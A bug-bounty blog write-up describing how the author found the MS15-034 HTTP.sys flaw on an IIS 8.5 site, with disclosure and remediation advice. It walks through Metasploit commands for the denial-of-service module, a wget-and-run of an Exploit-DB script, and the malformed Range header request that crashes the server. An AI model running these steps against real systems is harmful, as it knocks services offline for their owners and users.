Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Exploiting vulnerabilities without authorization is illegal.
Hi everyone, how are you? I hope you guys are well. I'm RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I hope you enjoy my article.
Windows Server running IIS - potential target for MS15-034
What is MS15–034?
MS15–034 is a critical vulnerability in HTTP.sys that may allow Remote Code Execution. This vulnerability affects the HTTP protocol stack (HTTP.sys) in Microsoft Windows, specifically in Internet Information Services (IIS).
This bug was first reported in 2015 and it's been over 7 years since its discovery. The vulnerability allows remote attackers to execute arbitrary code or cause a denial of service (DoS) condition on affected systems.
Back to the Question: "Does MS15–034 Still Exist Today?"
Answer: Yes, the bug still exists today! Despite being discovered years ago, many systems remain unpatched and vulnerable to this critical security flaw.
I found this vulnerability while doing penetration testing on a website. For privacy reasons,
let's call it www.site.com. The discovery process was quite straightforward
once I identified the underlying technology stack.
How I Found MS15–034
At first, I only checked what backend technology was used on the website using Wappalyzer, a popular browser extension for technology profiling.
Windows Server running IIS - potential target for MS15-034
The results showed that the website was running:
- Operating System: Windows Server
- Web Server: Microsoft IIS 8.5
This combination immediately reminded me of an article I had read about the MS15–034 vulnerability affecting IIS web servers. The specific version (IIS 8.5) was particularly interesting as it falls within the vulnerable range.
Technical Details of the Vulnerability
MS15-034 affects the HTTP.sys driver when it improperly parses specially crafted HTTP requests. The vulnerability can be triggered by sending a malformed Range header in an HTTP request, causing:
- Integer Overflow: Improper handling of Range header values
- Memory Corruption: Leading to potential code execution
- Denial of Service: System crashes and service interruption
- Blue Screen of Death (BSOD): Complete system failure
Exploitation Process
After reading about the vulnerability online, I decided to use Metasploit to verify if the target was vulnerable to this specific exploit.
Step-by-Step Exploitation
1. Open Metasploit Framework
# Start Metasploit console
msfconsole
2. Search for MS15-034 Module
# Search for the specific vulnerability
search ms15-034
# Or directly use the auxiliary module
use auxiliary/dos/http/ms15_034_ulonglongadd
3. Configure the Target
# Show available options
show options
# Find target IP using ping or dig
ping www.site.com
# Set the remote host target
set RHOST <target-ip-address>
Windows Server running IIS - potential target for MS15-034
4. Vulnerability Check
# Check if the target is vulnerable
check
Windows Server running IIS - potential target for MS15-034
Result: The check confirmed that the target server was indeed vulnerable to MS15-034!
5. Execute the Exploit
# Execute the DoS attack
exploit
# or alternatively
run
Alternative Exploitation Method
Instead of using Metasploit, I also tested with a Python script from Exploit-DB. This script provides more control over the exploitation process and demonstrates the raw HTTP request manipulation.
# Download exploit from Exploit-DB
wget https://www.exploit-db.com/exploits/36776
# Execute the Python exploit
python 36776.py <target-ip-address>
Exploitation Results
I won't demonstrate the full attack, but in my case, when the script was executed against
www.site.com, the server experienced a complete restart. The website crashed
temporarily, confirming the successful exploitation of the MS15-034 vulnerability.
Impact: The successful exploit resulted in a Denial of Service (DoS) condition, causing the entire web server to restart and making the website temporarily unavailable to legitimate users.
Technical Analysis
The vulnerability occurs due to improper validation of HTTP Range header requests. When a specially crafted request is sent with specific Range values, it triggers an integer overflow in the HTTP.sys driver, leading to:
- Memory Corruption: Invalid memory access patterns
- System Instability: Kernel-level crashes
- Service Interruption: Complete web service failure
Vulnerable HTTP Request Example
GET / HTTP/1.1
Host: target-website.com
Range: bytes=0-18446744073709551615
# The large Range value triggers the vulnerability
Impact Assessment
The MS15-034 vulnerability has severe implications for affected systems:
- Business Continuity: Web services become unavailable
- Financial Impact: Revenue loss due to downtime
- Reputation Damage: User trust and confidence erosion
- Security Exposure: Potential for further exploitation
Responsible Disclosure
Following responsible disclosure practices, I immediately reported this critical vulnerability to the website administrators.
Timeline
📅 01 May 2022: Vulnerability reported to www.site.com
✅ 01 May 2022: Website administrators respond to my report
🎉 01 May 2022: Received bounty reward for the discovery
Fast Response: The organization demonstrated excellent security practices with immediate acknowledgment and same-day resolution of the reported vulnerability.
Remediation and Prevention
To protect against MS15-034 and similar vulnerabilities, organizations should implement:
Immediate Actions
- Apply Security Patches: Install Microsoft Security Update MS15-034
- System Updates: Ensure Windows Server and IIS are fully updated
- Vulnerability Scanning: Regular automated security assessments
Long-term Security Measures
- Patch Management: Systematic approach to security updates
- Web Application Firewall: Filter malicious HTTP requests
- Network Monitoring: Detect unusual traffic patterns
- Security Auditing: Regular penetration testing and assessments
Why This Vulnerability Still Exists
Despite being discovered in 2015, MS15-034 continues to affect systems today due to:
- Legacy Systems: Older servers not receiving regular updates
- Patch Management Issues: Inconsistent security update processes
- Awareness Gaps: Administrators unaware of critical vulnerabilities
- Testing Concerns: Fear of breaking production systems during updates
Lessons Learned
This discovery reinforced several important cybersecurity principles:
- Legacy Vulnerabilities Persist: Old vulnerabilities remain dangerous
- Regular Assessment: Continuous security testing is essential
- Technology Profiling: Understanding target systems aids vulnerability identification
- Responsible Disclosure: Ethical reporting benefits everyone
Conclusion
The persistence of MS15-034 in 2022 (and likely beyond) demonstrates that legacy vulnerabilities remain a significant threat to organizations worldwide. Despite patches being available for years, many systems continue to operate without adequate security updates.
This case study highlights the importance of maintaining current security patches, regular vulnerability assessments, and proactive security management. For security researchers and penetration testers, it shows that sometimes the most effective attacks target well-known vulnerabilities that organizations have simply failed to address.
Maybe that's all from me, hopefully it can be a reference for you and sorry if there are things that are not clear. I'm RyuuKhagetsu, see you in the next article.
